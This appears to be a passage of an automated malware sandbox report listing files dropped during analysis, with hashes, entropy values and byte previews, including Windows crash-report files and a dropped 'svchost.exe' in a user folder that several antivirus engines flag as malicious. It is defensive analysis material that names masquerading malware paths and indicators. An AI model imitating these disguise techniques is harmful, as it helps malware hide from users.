                                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.5.4.2.6.1.4.8.4.4.5.1.6.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.5.4.2.6.1.4.8.8.9.8.2.9.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.9.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.c.5.4.0.c.5.-.4.2.8.0.-.4.c.f.b.-.8.c.4.f.-.b.c.2.8.2.0.a.a.9.1.1.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.a.s.s.e.m.b.l.y.c.h.a.n.g.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.c.4.-.0.0.0.1.-.0.0.1.7.-.4.0.b.a.-.a.6.1.f.4.c.a.3.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.9.4.5.2.1.9.7.3.1.7.1.9.b.2.e.a.4.2.6.d.c.9.f.5.c.a.b.2.7.c.1.0.0.0.0.0.0.0.0.!.0.0.0.0.e.4.c.d.6.5.c.3.1.5.d.7.c.4.c.3.7.a.8.9.7.6.7.e.1.1.f.9.c.5.2.d.6.4.7.5.3.d.0.f.!.t.a.s.k.h.o.s.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.0.8././.2.8.:.1.3.:.0.0.:.4.9.!.0.!.t.a.s.k.h.o.s.t...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE49.tmp.WERInternalMetadata.xml
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):7620
                                                                    Entropy (8bit):3.6899971075875073
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNiRe6w6YNr6AAgmfZ2oSnCp13P1fh6pdm:RrlsNiY6w6Yx6AAgmfUoSu39f/
                                                                    MD5:66A963EF273036ED453A7DAC23882679
                                                                    SHA1:DEB544FDB13D26E54242520F8C9E03B5EC1BFC7F
                                                                    SHA-256:3B3A936A4EAD7B4FC4544467245F060F174457239F34BC51DC553FF73F47BC7B
                                                                    SHA-512:B925D897F8E8E33749830F386BC9318DBB0004991F7C58C15D6C19B48FFEA9E233455DBD097C8758AE53ACFCDDE76899DB253A02EB59ED618A90F1A9D336F24F
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.5.4.8.<./.P.i.d.>.......
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERBF44.tmp.xml
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4683
                                                                    Entropy (8bit):4.445090832594526
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zsuJgtWI9y8WSC8B28fm8M4JFKQtWTFa+q8v1tWTdQeDN3RGd:uITfkJ1SNpJFKmKSdjN3RGd
                                                                    MD5:A7E90FB7735CE1D948082C45CB1DDDED
                                                                    SHA1:33D131051C620EEC1356417CAD38D0A549817D39
                                                                    SHA-256:55E61527AEAAEBD494849C23E550B8731C8B5A10AEDFF19827183466D75FD551
                                                                    SHA-512:B0ED19D17E7512AF006BF813C6FE0FFF12CE414B3E627EFDC243C9FBBB3C203615C846DB6C1752B084CB20BAF460C1121A70B7926159B52B940D6A9F21DB7030
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1155093" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERDBF2.tmp.dmp
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Mon Sep 6 18:22:37 2021, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):17418
                                                                    Entropy (8bit):2.180452948610077
                                                                    Encrypted:false
                                                                    SSDEEP:96:58J8D/+0nlZKLfnQxWXBMc82dJ7icI/NJS1WIXYWIdI4zEVu9:jtnXrWXBd82v7BsNJLzEVu9
                                                                    MD5:A915F6C65D737F9D725BEFAA6D1611AF
                                                                    SHA1:7F01864E6EC6FAB3B17924769777B674B8D6482E
                                                                    SHA-256:A81A9E39A0FCDA95422AC9D34C45EF1D7EAC037C5C4E8678D9DCCD38372C771E
                                                                    SHA-512:4C73BF6A239C400E09D255DDF17E1F7F3C93E2A9FA6FE2920ECA60F3D7B2980AAD876230957DB90A4E05E817B694AB60235AEB9B01A61C1C23028A8C3B099312
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: MDMP....... .......m\6a...................U...........B......t.......GenuineIntelW...........T...........f\6a.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC60.tmp.dmp
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:Mini DuMP crash report, 14 streams, Mon Sep 6 18:22:37 2021, 0x1205a4 type
                                                                    Category:dropped
                                                                    Size (bytes):17418
                                                                    Entropy (8bit):2.1919939055520095
                                                                    Encrypted:false
                                                                    SSDEEP:96:58uA8D/gDlZoLfnEtWXvJMMk2YR9pic7CCFYWInWIXmI4Xxcqua:nUXlWXB9k20XB7C8/Xxcqua
                                                                    MD5:3EF2F61C08E3469F3B17F6EDBBAD7203
                                                                    SHA1:EBA0AEACE9CABE4635BDE8C33656D0792382D0BC
                                                                    SHA-256:CB1C4EB01B42CF11CB74CEC598A8D5CDA6693EE5B0F6381307E963A9A7D2BA5D
                                                                    SHA-512:B12B7D83154D5AB647D02AC1EE711F8FEF8DCE3CD75ECABABBEC5DC4E6DFF78D43689ADFDC09EEC9252CA64C681F00E047D7B03EBF8A0CDC76F77ABCC32D1387
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: MDMP....... .......m\6a...................U...........B......t.......GenuineIntelW...........T...........f\6a.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF7D.tmp.WERInternalMetadata.xml
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):5678
                                                                    Entropy (8bit):3.7237378697862953
                                                                    Encrypted:false
                                                                    SSDEEP:96:RtIU6o7r3GLt3iVWjW67QpYZIP9Sf1zgduBCaM1Bf1fIdLLm:Rrl7r3GLNiVWjW67eYZo9SnCp1Bf1fUi
                                                                    MD5:74161DE7FA537E233EEBAC3462A7D6C0
                                                                    SHA1:0CE559ABD6238C69D851A36A0F0709F39DD38809
                                                                    SHA-256:B81031E723CDB8F922FEB925A39BCBC2E0B2AECA08F92EBEC1FB5AACB016BEA9
                                                                    SHA-512:D02E4782CC7F20DF792D997931A5E04EBD9D243C2E82AC9A5AD68E24A2AEC5E17E724983956D9CC7C8FF9D106509302FA443314C2B86BCEC24993672D828BB15
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.0.4.<./.P.i.d.>.......
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE078.tmp.WERInternalMetadata.xml
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8302
                                                                    Entropy (8bit):3.703646611660962
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNii762W6YRb6jogmf5DSwCprA89bBzsfuLm:RrlsNie6f6Yd6jogmfNSVBYfT
                                                                    MD5:E225D9414F16E474933B5C6E134743F9
                                                                    SHA1:92A9A8298CA258BEC8ECBBD24BD0CCBD22EA1A90
                                                                    SHA-256:25F661A69E6D7C0B71EE29887F7D211CD8D659DD0C33F99E6B0A414912523BF6
                                                                    SHA-512:C3C477F737357861C825068911608C79106A638A22A336CBDB5378148412BF56A62B8A882A69EACC7ADCB5E05B3A9AE4372E602F1DC409EDBC78EEA3DFA85290
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.8.0.<./.P.i.d.>.......
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0E5.tmp.WERInternalMetadata.xml
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):8302
                                                                    Entropy (8bit):3.703632832604666
                                                                    Encrypted:false
                                                                    SSDEEP:192:Rrl7r3GLNi5g69/Ce6YRd6jogmf5BSwCprsx89bB3sfmLm:RrlsNie6J6Yb6jogmfPSnB8f7
                                                                    MD5:7EA759AFEAD8A648D808576BE9174782
                                                                    SHA1:1A645E1D64B1987EBCC32A859FE07117AA294B36
                                                                    SHA-256:CEC1207937AD43D66A1F7CBEA2E636E3E06045AEE3C05FABA753C6CB6DF1EC29
                                                                    SHA-512:454D529F4FEE96D7AFDA7E7CA1ED0CCB769098CC9E8DE4DEFBDF68D2BE8AB9106EBEA16DF2E57265DA34D0CC212DDD123EE231512E8479FFCA7E8D73FC3CDD8A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.9.2.<./.P.i.d.>.......
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE172.tmp.xml
                                                                    Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4708
                                                                    Entropy (8bit):4.454077258851763
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zsuJgtWI9y8WSC8BG8fm8M4JFKs19EJ+F0+q8vR19EJhi+elJGd:uITfkJ1SNFJFKoWKpR+cJGd
                                                                    MD5:633B7885757E5BC725D1C73075632E31
                                                                    SHA1:88542DE807D2D7A2436FDE3FF75F614157EFCB8A
                                                                    SHA-256:92A23107906A7E672FD84DE42B79BA7671802B265FD6E07F81A0848921F49DC9
                                                                    SHA-512:90AD80F4DDA2D1E5832CA9884E9AF02D757F4229049CDA9BC08946486513C7F72682EE41C43E11A05B94CEEB783BB3F19D5159CE1FC07BCFA3DE0465DFE78D3D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1155093" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE23E.tmp.xml
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4644
                                                                    Entropy (8bit):4.482246274784607
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zsuJgtWI9y8WSC8B88fm8M4JzEZFUs+q8jUDlu5nVhd:uITfkJ1SNXJ49fDlu5nVhd
                                                                    MD5:2EF23EF76DAEBCFCBCF04D819B06583E
                                                                    SHA1:CF849D769883A499D766792BD7E0668D069FD74A
                                                                    SHA-256:B9A0D438D30585B2E21D153BA3D6AF945F47BF0EB025AB83AACBB8386FE560C4
                                                                    SHA-512:6B301A2D1140059312CB54343250D8A244B153D1D996002EA5D132C6E5B0187F73C6D2B017544E558601E833ED8F8FB3F14F5171E5F491F418F367CA53CE5248
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1155093" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERE29C.tmp.xml
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):4644
                                                                    Entropy (8bit):4.484315275880367
                                                                    Encrypted:false
                                                                    SSDEEP:48:cvIwSD8zsuJgtWI9y8WSC8BF8fm8M4JlEZFG++q8VUy+lMSkd:uITfkJ1SNsJaLJflTkd
                                                                    MD5:41AC42D75ECF29A1E124CCE94337CA6B
                                                                    SHA1:36E100F603F2278833206878C1249596AB1A2878
                                                                    SHA-256:0AE6D3B37175B058FDAFD8E1581C3F4516F0FADDF01837095F37A84AAD249F35
                                                                    SHA-512:14AC76C0ABF1B3A00A1569EF69CABE8FC01FC7ED24607A9DCD959CD76F99097419BA22D125B56E83DFF74A414D4AC380F25B4F8AF257267282B3B16406DC17F6
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1155093" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                    C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe
                                                                    Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):57344
                                                                    Entropy (8bit):4.5317531123948465
                                                                    Encrypted:false
                                                                    SSDEEP:768:OGjo7j58ODEYBhzjYBUbBBcJJJB4JnE2rVJjRHNIRFqdXrZjBEwnn:OGU7j58OdZOID8L2E2XbIRFqBrcon
                                                                    MD5:A273A781070D239BA99D3FD8EF341E6C
                                                                    SHA1:650FC260C3CBC8FDB37BD18AFCFA089AA2132B96
                                                                    SHA-256:92EC56AE1720E4B05078BB970C4655904CC61BA11FD13482D1B234504589DF2B
                                                                    SHA-512:A37F71BE8362822018A348F84D41F2549F57B2EC310FAF8086637F0E83D03FBBB2A8E71C6299F535A4CBB01A1E81CBCAE8801EC8DDD0622A80A134C8455F96A2
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: Metadefender, Detection: 71%
                                                                    • Antivirus: ReversingLabs, Detection: 86%
                                                                    Reputation:unknown
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2*a..................... ......^.... ........@.. ....................... ............@.....................................W.................................................................................... ............... ..H............text...d.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\svchost.exe.log
                                                                    Process:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):777
                                                                    Entropy (8bit):5.272921406044998
                                                                    Encrypted:false
                                                                    SSDEEP:12:Q3LaJcP0/9UkB9t0kaHYGLi1B01kKVdisk70hK9C4XXhK9yi0z6+xaiv:ML2pBLaYgioQ6K/XhKoRr
                                                                    MD5:4D1946DC78B777109FC1B7FF3223B745
                                                                    SHA1:869F3C7550F8B8DE446AE53D6DA234DC24ABD3A5
                                                                    SHA-256:B62BB3914340F56B816EB8883F8459009F25CA430D81948B54F6BE2EBEEFDF76
                                                                    SHA-512:F5BE526A078FB12F42A786A317FB12B13982F382EB0362016AFFCBF122A8A5AB3EB8C406F8EC66ED9AC8E94743B3860D146E6CC5FDC188412F4450403163E7A1
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualBas#\76002c3c0a2b9f0c8687ad35e8d9d309\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\b12bbcf27f41d96fe44360ae0b566f9b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\454c09ea87bde1d5f545d60232083b79\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\93e312980de126a432df42707b07336c\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\e681e359556f0991834c31646ebd5526\System.Xml.ni.dll",0..
                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\iExplorer.exe.log
                                                                    Process:C:\Users\user\AppData\Local\Temp\iExplorer.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):916
                                                                    Entropy (8bit):5.282390836641403
                                                                    Encrypted:false
                                                                    SSDEEP:24:MLF20NaL3z2p29hJ5g522rW2xAi3AP26K95rKoO2+g2+:MwLLD2Y9h3go2rxxAcAO6ox+g2+
                                                                    MD5:5AD8E7ABEADADAC4CE06FF693476581A
                                                                    SHA1:81E42A97BBE3D7DE8B1E8B54C2B03C48594D761E
                                                                    SHA-256:BAA1A28262BA27D51C3A1FA7FB0811AD1128297ABB2EDCCC785DC52667D2A6FD
                                                                    SHA-512:7793E78E84AD36CE65B5B1C015364E340FB9110FAF199BC0234108CE9BCB1AEDACBD25C6A012AC99740E08BEA5E5C373A88E553E47016304D8AE6AEEAB58EBFF
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Runtime.Remo#\35774dc3cd31b4550ab06c3354cf4ba5\System.Runtime.Remoting.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Configuration\de460308a9099237864d2ec2328fc958\System.Configuration.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\527c933194f3a99a816d83c619a3e1d3\System.Xml.ni.dll",0..
                                                                    C:\Users\user\AppData\Local\Temp\MULTIBOT_NEWW.exe
